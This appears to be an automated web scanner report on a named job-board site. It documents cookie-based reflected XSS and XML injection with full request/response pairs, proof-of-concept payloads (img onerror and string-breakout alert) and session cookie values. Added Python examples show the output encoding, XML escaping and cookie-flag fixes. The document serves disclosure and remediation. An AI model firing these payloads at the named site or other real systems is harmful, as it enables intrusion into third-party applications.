<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//ENCD58C";ALERT(1)//1A305BEE659\">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0e85"><img%20src%3da%20onerror%3dalert(1)>5e8abc94283 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as c0e85"><img src=a onerror=alert(1)>5e8abc94283 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/works/linkview.cfm?set=JSR HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=enc0e85"><img%20src%3da%20onerror%3dalert(1)>5e8abc94283; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:45 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="enc0e85"><img src=a onerror=alert(1)>5e8abc94283">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 547b0"%3balert(1)//a5d8ef8c477 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 547b0";alert(1)//a5d8ef8c477 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/works/resourcesoverview.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en547b0"%3balert(1)//a5d8ef8c477; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:53 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN547B0";ALERT(1)//A5D8EF8C477\">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14e61"><img%20src%3da%20onerror%3dalert(1)>6a2d11c994c was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 14e61"><img src=a onerror=alert(1)>6a2d11c994c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/works/resourcesoverview.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en14e61"><img%20src%3da%20onerror%3dalert(1)>6a2d11c994c; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:48 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en14e61"><img src=a onerror=alert(1)>6a2d11c994c">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53fa7"><img%20src%3da%20onerror%3dalert(1)>6f76395c81f was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 53fa7"><img src=a onerror=alert(1)>6f76395c81f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /favicon.ico HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en53fa7"><img%20src%3da%20onerror%3dalert(1)>6f76395c81f; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:28:25 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en53fa7"><img src=a onerror=alert(1)>6f76395c81f"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c6ff"%3balert(1)//cac32dd0109 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 8c6ff";alert(1)//cac32dd0109 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response: the unescaped " terminates the string literal, ; ends the statement, and // comments out the remainder of the original line. One caveat when reading the response excerpt below: the copy that lands inside the string literal has been upper-cased by the application (ALERT(1)), and JavaScript identifiers are case-sensitive, so this exact payload would not call alert from that location. The breakout itself is real, but a working exploit needs a payload that survives the case conversion.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /favicon.ico HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en8c6ff"%3balert(1)//cac32dd0109; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:28:27 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN8C6FF";ALERT(1)//CAC32DD0109\"> ...[SNIP]...
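Both SYSTRANLANGUAGE findings above come down to the same output-encoding failure in two different contexts: an HTML attribute and a JavaScript string literal. The Python below is an added example, not code from the report or from the site's ColdFusion source. It reconstructs the two vulnerable rendering patterns from the response excerpts (the surrounding markup and the document.write wrapper are assumptions), feeds them the report's two payloads, and shows that context-appropriate encoding (entity encoding for the attribute, a JSON-style string literal for the script) keeps the cookie value from escaping its context. It does not model the upper-casing seen in the second response.

```python
import html
import json
from html.parser import HTMLParser

# Payloads taken from the two findings above: the cookie's normal value "en"
# followed by the scanner's marker strings, URL-decoded as the server saw them.
ATTR_PAYLOAD = 'en53fa7"><img src=a onerror=alert(1)>6f76395c81f'
JS_PAYLOAD = 'en8c6ff";alert(1)//cac32dd0109'

XHTML_NS = "http://www.w3.org/1999/xhtml"


def render_lang_attr_unsafe(lang: str) -> str:
    # Reconstruction (assumed layout) of the pattern in the response excerpt:
    # the cookie value lands in xml:lang with no encoding at all.
    return f'<html xmlns="{XHTML_NS}" xml:lang="{lang}">'


def render_lang_attr_safe(lang: str) -> str:
    # html.escape(quote=True) encodes & < > " and ' so the value can neither
    # close the quoted attribute nor start a new tag.
    return f'<html xmlns="{XHTML_NS}" xml:lang="{html.escape(lang, quote=True)}">'


def render_doctype_js_unsafe(lang: str) -> str:
    # Reconstruction of the second finding: the developer escaped the quotes
    # they wrote themselves (\") but concatenated the cookie value raw.
    return ('document.write("<!DOCTYPE HTML PUBLIC \\"-//W3C//DTD HTML 4.01 '
            'Transitional//' + lang + '\\">");')


def render_doctype_js_safe(lang: str) -> str:
    # json.dumps yields a valid JavaScript string literal with " and \ escaped
    # and non-ASCII (including U+2028/2029) as \uXXXX; "</" is additionally
    # broken up so the literal cannot close an enclosing <script> element.
    literal = json.dumps("-//W3C//DTD HTML 4.01 Transitional//" + lang)
    literal = literal.replace("</", "<\\/")
    return ('document.write("<!DOCTYPE HTML PUBLIC \\"" + ' + literal
            + ' + "\\">");')


class _StartTags(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def start_tags(markup: str) -> list:
    # Which elements does a browser-like parser see? Exactly one <html> is
    # expected; anything more means the attribute value escaped its quotes.
    parser = _StartTags()
    parser.feed(markup)
    parser.close()
    return parser.tags


def code_outside_strings(js: str) -> str:
    # Minimal tokenizer: return every character that sits outside a
    # double-quoted string literal (backslash escapes honoured). If attacker
    # text shows up here, it is in code position and will execute.
    out, in_str, i = [], False, 0
    while i < len(js):
        c = js[i]
        if in_str:
            if c == "\\":
                i += 1          # skip the escaped character
            elif c == '"':
                in_str = False
        elif c == '"':
            in_str = True
        else:
            out.append(c)
        i += 1
    return "".join(out)


if __name__ == "__main__":
    print(start_tags(render_lang_attr_unsafe(ATTR_PAYLOAD)))   # ['html', 'img']
    print(start_tags(render_lang_attr_safe(ATTR_PAYLOAD)))     # ['html']
    print(code_outside_strings(render_doctype_js_unsafe(JS_PAYLOAD)))
    print(code_outside_strings(render_doctype_js_safe(JS_PAYLOAD)))
```

In ColdFusion 10 and later the built-in equivalents are encodeForHTMLAttribute() and encodeForJavaScript(); older releases ship only HTMLEditFormat(), which covers the attribute case but not the script case, which is one more reason to follow the remediation detail above and keep cookie values out of script blocks entirely.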
The usvuserid parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the usvuserid parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Issue background
XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.
This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.
Issue remediation
The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt; (and & with &amp;).
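As an added illustration (not part of the report), the Python below reconstructs what the scanner's heuristic relies on: a value pasted into an XML document, here inside a CDATA section, is ended early by the ]]> sequence in the payload, and the resulting document no longer parses. The element name usvuserid is the parameter from the finding; the GetUser envelope, the CDATA layout and the base value "alice" are constructed, since the real backend message is not visible. Two safe builders follow, one using the entity replacement the remediation describes and one building the tree through the XML API.

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Payload from the finding: the scanner appended "]]>>" to the parameter.
# "alice" is a constructed base value.
PAYLOAD = "alice]]>>"


def build_request_unsafe(user_id: str) -> str:
    # Assumed backend pattern: the parameter is pasted into a CDATA section
    # of a GetUser message. A "]]>" inside the value terminates the section
    # and whatever follows is parsed as markup.
    return ("<GetUser><usvuserid><![CDATA[" + user_id
            + "]]></usvuserid></GetUser>")


def build_request_escaped(user_id: str) -> str:
    # Entity replacement as the remediation describes: & < > become
    # &amp; &lt; &gt;, so "]]>" can no longer form a CDATA terminator.
    return ("<GetUser><usvuserid>" + escape(user_id)
            + "</usvuserid></GetUser>")


def build_request_tree(user_id: str) -> str:
    # Preferred form: let the XML API serialise the text; it escapes for us.
    root = ET.Element("GetUser")
    ET.SubElement(root, "usvuserid").text = user_id
    return ET.tostring(root, encoding="unicode")


def parse_user_id(doc: str):
    # What a server-side consumer would do. None stands in for the parser
    # error the scanner keys on (expat rejects a stray "]]>" in text content).
    try:
        return ET.fromstring(doc).findtext("usvuserid")
    except ET.ParseError:
        return None


if __name__ == "__main__":
    for build in (build_request_unsafe, build_request_escaped, build_request_tree):
        doc = build(PAYLOAD)
        print(build.__name__, "->", doc)
        print("   parsed usvuserid:", parse_user_id(doc))
```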
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:26:09 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
3. SSL cookie without secure flag set
There are 29 instances of this issue:
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
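Every Set-Cookie header in the responses below carries only a path attribute. The Python that follows is an added example, not from the report: it parses such headers, flags the missing Secure flag, marks names that look like session identifiers (CFID and CFTOKEN are ColdFusion's client/session identifiers, which is why the report singles them out), and rewrites the header with the flag added. It also reports HttpOnly, which this finding does not discuss. The header list is copied from this section; the name heuristic is the example's own.

```python
import re

# Set-Cookie values copied from the responses in this section (constructed
# list; all were returned over HTTPS with nothing but a path attribute).
OBSERVED_SET_COOKIE = [
    "CFID=4223843;path=/",
    "CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/",
    "TEST=1;path=/",
    "SYSTRANLANGUAGE=en;path=/",
]

# Heuristic (assumed, not from the report) for names that usually carry a
# session token. CFID/CFTOKEN are ColdFusion's client identifiers.
SESSION_NAME_HINT = re.compile(r"(sess|sid|token|cfid|cftoken|auth)", re.I)

# Canonical spelling for attributes we re-emit.
_CANONICAL = {"path": "Path", "domain": "Domain", "expires": "Expires",
              "max-age": "Max-Age", "secure": "Secure",
              "httponly": "HttpOnly", "samesite": "SameSite"}


def parse_set_cookie(header: str) -> dict:
    # Split one Set-Cookie value into name, value and a lower-cased
    # attribute map. Only the first "=" separates name from value.
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if not part:
            continue
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return {"name": name.strip(), "value": value, "attrs": attrs}


def audit_set_cookie(header: str) -> list:
    # Findings for one header, in a fixed order so results are comparable.
    cookie = parse_set_cookie(header)
    findings = []
    if "secure" not in cookie["attrs"]:
        findings.append("missing Secure")
    if "httponly" not in cookie["attrs"]:
        findings.append("missing HttpOnly")
    if findings and SESSION_NAME_HINT.search(cookie["name"]):
        findings.append("looks like a session token")
    return findings


def audit_all(headers) -> dict:
    return {parse_set_cookie(h)["name"]: audit_set_cookie(h) for h in headers}


def harden(header: str) -> str:
    # Re-emit the header with Secure and HttpOnly present (idempotent).
    cookie = parse_set_cookie(header)
    attrs = dict(cookie["attrs"])
    attrs.setdefault("secure", "")
    attrs.setdefault("httponly", "")
    rendered = [f"{cookie['name']}={cookie['value']}"]
    for key, val in attrs.items():
        name = _CANONICAL.get(key, key)
        rendered.append(f"{name}={val}" if val else name)
    return "; ".join(rendered)


if __name__ == "__main__":
    for header in OBSERVED_SET_COOKIE:
        print(header)
        print("   findings:", audit_set_cookie(header))
        print("   hardened:", harden(header))
```

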